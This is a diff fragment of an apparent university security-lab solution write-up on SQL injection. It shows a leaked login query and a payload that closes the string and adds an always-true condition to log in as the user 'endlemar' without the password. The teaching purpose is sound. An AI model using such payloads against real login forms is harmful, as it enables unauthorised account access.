pokusew/fel-kbe-web-app-security-lab/SQL-Injection-Solution.md

 Wrong SQL query: SELECT username FROM users WHERE username = 'endlemar' AND password = SHA1(CONCAT(''XXX', (SELECT salt FROM users WHERE username = 'endlemar')))
 ```

-Seeing the whole query and the position of my “password” `'XXX`, I constructed the following value for `password` that
+Seeing the whole query and the position of my “password” `'XXX`, I constructed the following value for `password`
+that allowed me to login without the correct password
-will result one row where username is `endlemar`:
+(because the SQL query resulted in one row where username is `endlemar`):

 ```
 ')) OR 1 = 1 AND username = 'endlemar' --